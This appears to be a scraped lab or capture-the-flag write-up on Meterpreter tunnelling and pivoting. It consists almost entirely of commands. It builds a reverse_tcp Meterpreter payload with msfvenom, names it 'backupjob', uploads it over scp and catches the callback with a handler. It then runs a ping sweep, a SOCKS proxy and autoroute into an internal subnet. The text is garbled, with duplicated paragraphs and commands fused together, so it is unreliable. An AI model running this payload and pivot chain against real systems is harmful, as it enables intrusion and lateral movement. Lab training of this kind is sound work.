Meterpreter Tunneling & Port Forwarding
June 22, 2024

ssh ubuntu@10.129.53.227



Now we need a listener in the attacker machine, we will use the msfconsole for this


Then for the next question





Last updated
June 22, 2024

ssh ubuntu@10.129.53.227



Now we need a listener in the attacker machine, we will use the msfconsole for this


Then for the next question





Last updated
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.113 -f elf -o backupjob LPORT=8080
lsscp backupjob ubuntu@10.129.53.227:/tmpcd /tmp
ls
chmod +x backupjobmsfconsole -q
search multi/handler
options
set payload linux/x64/meterpreter/reverse_tcp
set lhost
set lport
runrun post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23use auxiliary/server/socks_proxy
options
set SRVPORT 9050run
*Press enter*
jobssudo subl /usr/local/etc/proxychains.confuse post/multi/manage/autoroute
set session 2
set SUBNET 172.16.5.0
run
# To see the sessions or the linux session we just used this command
sessions -l